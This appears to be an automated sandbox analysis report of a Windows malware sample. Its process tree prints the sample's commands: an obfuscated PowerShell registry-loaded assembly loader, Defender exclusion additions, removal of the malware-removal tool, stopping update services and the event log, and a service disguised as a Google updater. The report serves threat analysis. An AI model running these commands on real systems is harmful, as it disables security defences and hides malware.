Analysis
-
max time kernel
150s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 13:12
Static task
static1
Behavioral task
behavioral1
Sample
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe
Resource
win10v2004-20241007-en
General
-
Target
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe
-
Size
15.9MB
-
MD5
d3c16cede9b6e4ee304a0184328d313d
-
SHA1
bd82838a3cc343956ecce4d5051b510dd941de11
-
SHA256
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c
-
SHA512
284c38ba1a8ce4120120eb89a8e17bcbb6c3d18874c189d65812e767a111883813163ab614d5de802b5ee2fe774143a84017399508c24ac061029828d3046f6b
-
SSDEEP
393216:fwibRRlK6/C+1ZDpHKG1cVWNEtW5I+L11k2OEin:f7RllK+LlaaSW5zL1ypEin
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 1920 created 432 1920 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.EXEpid process 2392 powershell.exe 2940 powershell.exe 1920 powershell.EXE -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 2 IoCs
Processes:
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Executes dropped EXE 2 IoCs
Processes:
services.exeupdater.exepid process 476 services.exe 2304 updater.exe -
Loads dropped DLL 1 IoCs
Processes:
services.exepid process 476 services.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 3056 powercfg.exe 2000 powercfg.exe 1948 powercfg.exe 856 powercfg.exe 2632 powercfg.exe 2624 powercfg.exe 2604 powercfg.exe 2580 powercfg.exe -
Drops file in System32 directory 7 IoCs
Processes:
svchost.exepowershell.exee4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exepowershell.EXEpowershell.exeupdater.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\dialersvc64 svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe updater.exe File created C:\Windows\System32\Tasks\dialersvc64 svchost.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exepowershell.EXEupdater.exedescription pid process target process PID 3016 set thread context of 2088 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 1920 set thread context of 2892 1920 powershell.EXE dllhost.exe PID 2304 set thread context of 2420 2304 updater.exe dialer.exe PID 2304 set thread context of 2736 2304 updater.exe dialer.exe PID 2304 set thread context of 3016 2304 updater.exe dialer.exe -
Drops file in Windows directory 2 IoCs
Processes:
wusa.exewusa.exedescription ioc process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2692 sc.exe 2232 sc.exe 1316 sc.exe 2812 sc.exe 2272 sc.exe 2872 sc.exe 2784 sc.exe 2780 sc.exe 2856 sc.exe 2616 sc.exe 1796 sc.exe 2444 sc.exe 1996 sc.exe 2108 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 904ce206173cdb01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 42 IoCs
Processes:
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exepowershell.exepowershell.EXEupdater.exepowershell.exedllhost.exepid process 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2392 powershell.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 1920 powershell.EXE 2304 updater.exe 2304 updater.exe 1920 powershell.EXE 2940 powershell.exe 2892 dllhost.exe 2892 dllhost.exe 2892 dllhost.exe 2892 dllhost.exe 2304 updater.exe 2304 updater.exe 2304 updater.exe 2304 updater.exe 2304 updater.exe 2304 updater.exe 2304 updater.exe 2304 updater.exe 2304 updater.exe 2304 updater.exe 2304 updater.exe 2304 updater.exe 2304 updater.exe 2892 dllhost.exe 2892 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.EXEpowershell.exedllhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 2392 powershell.exe Token: SeShutdownPrivilege 2632 powercfg.exe Token: SeShutdownPrivilege 2580 powercfg.exe Token: SeShutdownPrivilege 2624 powercfg.exe Token: SeShutdownPrivilege 2604 powercfg.exe Token: SeDebugPrivilege 1920 powershell.EXE Token: SeDebugPrivilege 1920 powershell.EXE Token: SeDebugPrivilege 2940 powershell.exe Token: SeDebugPrivilege 2892 dllhost.exe Token: SeShutdownPrivilege 1948 powercfg.exe Token: SeShutdownPrivilege 856 powercfg.exe Token: SeShutdownPrivilege 3056 powercfg.exe Token: SeShutdownPrivilege 2000 powercfg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exee4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exetaskeng.exepowershell.EXEdllhost.execmd.exeupdater.exedescription pid process target process PID 2784 wrote to memory of 2956 2784 cmd.exe wusa.exe PID 2784 wrote to memory of 2956 2784 cmd.exe wusa.exe PID 2784 wrote to memory of 2956 2784 cmd.exe wusa.exe PID 3016 wrote to memory of 2088 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 3016 wrote to memory of 2088 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 3016 wrote to memory of 2088 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 3016 wrote to memory of 2088 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 3016 wrote to memory of 2088 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 3016 wrote to memory of 2088 3016 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 1500 wrote to memory of 1920 1500 taskeng.exe powershell.EXE PID 1500 wrote to memory of 1920 1500 taskeng.exe powershell.EXE PID 1500 wrote to memory of 1920 1500 taskeng.exe powershell.EXE PID 1920 wrote to memory of 2892 1920 powershell.EXE dllhost.exe PID 1920 wrote to memory of 2892 1920 powershell.EXE dllhost.exe PID 1920 wrote to memory of 2892 1920 powershell.EXE dllhost.exe PID 1920 wrote to memory of 2892 1920 powershell.EXE dllhost.exe PID 1920 wrote to memory of 2892 1920 powershell.EXE dllhost.exe PID 1920 wrote to memory of 2892 1920 powershell.EXE dllhost.exe PID 1920 wrote to memory of 2892 1920 powershell.EXE dllhost.exe PID 1920 wrote to memory of 2892 1920 powershell.EXE dllhost.exe PID 1920 wrote to memory of 2892 1920 powershell.EXE dllhost.exe PID 2892 wrote to memory of 432 2892 dllhost.exe winlogon.exe PID 2892 wrote to memory of 476 2892 dllhost.exe services.exe PID 2892 wrote to memory of 492 2892 dllhost.exe lsass.exe PID 2892 wrote to memory of 500 2892 dllhost.exe lsm.exe PID 2892 wrote to memory of 592 2892 dllhost.exe svchost.exe PID 2892 wrote to memory of 676 2892 dllhost.exe svchost.exe PID 2892 wrote to memory of 740 2892 dllhost.exe svchost.exe PID 2892 wrote to memory of 820 2892 dllhost.exe svchost.exe PID 2892 wrote to memory of 848 2892 dllhost.exe svchost.exe PID 2892 wrote to memory of 972 2892 dllhost.exe svchost.exe PID 2892 wrote to memory of 276 2892 dllhost.exe svchost.exe PID 2892 wrote to memory of 328 2892 dllhost.exe spoolsv.exe PID 2892 wrote to memory of 1064 2892 dllhost.exe svchost.exe PID 2892 wrote to memory of 1108 2892 dllhost.exe taskhost.exe PID 2892 wrote to memory of 1172 2892 dllhost.exe Dwm.exe PID 2892 wrote to memory of 1196 2892 dllhost.exe Explorer.EXE PID 2892 wrote to memory of 556 2892 dllhost.exe OSPPSVC.EXE PID 2892 wrote to memory of 840 2892 dllhost.exe wmiprvse.exe PID 2892 wrote to memory of 1636 2892 dllhost.exe DllHost.exe PID 2892 wrote to memory of 2544 2892 dllhost.exe svchost.exe PID 2892 wrote to memory of 2292 2892 dllhost.exe sppsvc.exe PID 2892 wrote to memory of 2444 2892 dllhost.exe sc.exe PID 2892 wrote to memory of 320 2892 dllhost.exe conhost.exe PID 2892 wrote to memory of 1500 2892 dllhost.exe taskeng.exe PID 2892 wrote to memory of 2304 2892 dllhost.exe updater.exe PID 2892 wrote to memory of 1920 2892 dllhost.exe powershell.EXE PID 2892 wrote to memory of 1752 2892 dllhost.exe conhost.exe PID 2692 wrote to memory of 2584 2692 cmd.exe wusa.exe PID 2692 wrote to memory of 2584 2692 cmd.exe wusa.exe PID 2692 wrote to memory of 2584 2692 cmd.exe wusa.exe PID 2304 wrote to memory of 2420 2304 updater.exe dialer.exe PID 2304 wrote to memory of 2420 2304 updater.exe dialer.exe PID 2304 wrote to memory of 2420 2304 updater.exe dialer.exe PID 2304 wrote to memory of 2420 2304 updater.exe dialer.exe PID 2304 wrote to memory of 2420 2304 updater.exe dialer.exe PID 2304 wrote to memory of 2420 2304 updater.exe dialer.exe PID 2304 wrote to memory of 2736 2304 updater.exe dialer.exe PID 2304 wrote to memory of 2736 2304 updater.exe dialer.exe PID 2304 wrote to memory of 2736 2304 updater.exe dialer.exe PID 2304 wrote to memory of 2736 2304 updater.exe dialer.exe PID 2304 wrote to memory of 2736 2304 updater.exe dialer.exe PID 2304 wrote to memory of 2736 2304 updater.exe dialer.exe PID 2304 wrote to memory of 2736 2304 updater.exe dialer.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{46316615-b958-4da1-ba2f-c1b3fc9cfc80}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2892
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:476 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:592
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:840
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1636
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:676
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:740
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:820
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1172
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
PID:848 -
C:\Windows\system32\taskeng.exetaskeng.exe {72A7E93F-BAF4-4BA1-B7F5-DEBD9CB0A3F6} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+'F'+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue('d'+[Char](105)+'a'+[Char](108)+''+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1920
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:972
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:276
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:328
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1064
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1108
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:556
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2544
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2292
-
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
PID:2584
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:2272
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2108
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:2784
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:2812
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:1996
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:856
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:2420
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:2736
-
-
C:\Windows\system32\dialer.exedialer.exe3⤵PID:3016
-
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:492
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:500
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe"C:\Users\Admin\AppData\Local\Temp\e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
PID:2956
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:2780
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2692
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:2232
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:2872
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:2616
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:2088
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:1796
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"3⤵
- Launches sc.exe
PID:2856
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:1316
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:2444
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-5130174561907571396-2091534661386456186627431108-996097639-1217335925976755497"1⤵PID:320
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-672572833-9480255021621462498-1508592931597472469-12356079001918247961996776128"1⤵PID:1752
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD59fccb6d75db2f23a13d707e055dfe930
SHA14652f265214c02acf4efc86cd06821ac74f2032b
SHA25650b882320951621679d7f918cf10e99ef6ccd25e9afe0cec127bfae619dcce47
SHA5126dabf6cff6c7372d5db423a6049e6a2cf732e5ee26ac76accd5eb36d42ebe51be47dc5f4bf1745bc10adcf0c8282b059f4b9c6a4090d031d8ba20db0c196f4ad
-
Filesize
3KB
MD54f9d9c2ae7b134963b4be3f67aeab8cb
SHA191a63a9655786a0267010aaa811135033084561b
SHA256a1d4e2e3c808b03bd4e21eb57d93576bfffd9be422587a61d3e67abb67806d2f
SHA51207fb8e1ddbc809803987d1ef6df97ca137ba18a13eccca1bf9a1e5b32b41da181c34045e1b63319d502ecdc95f038e84e01b7af03cb38efd53b6a949c82c9edd
-
Filesize
15.9MB
MD5d3c16cede9b6e4ee304a0184328d313d
SHA1bd82838a3cc343956ecce4d5051b510dd941de11
SHA256e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c
SHA512284c38ba1a8ce4120120eb89a8e17bcbb6c3d18874c189d65812e767a111883813163ab614d5de802b5ee2fe774143a84017399508c24ac061029828d3046f6b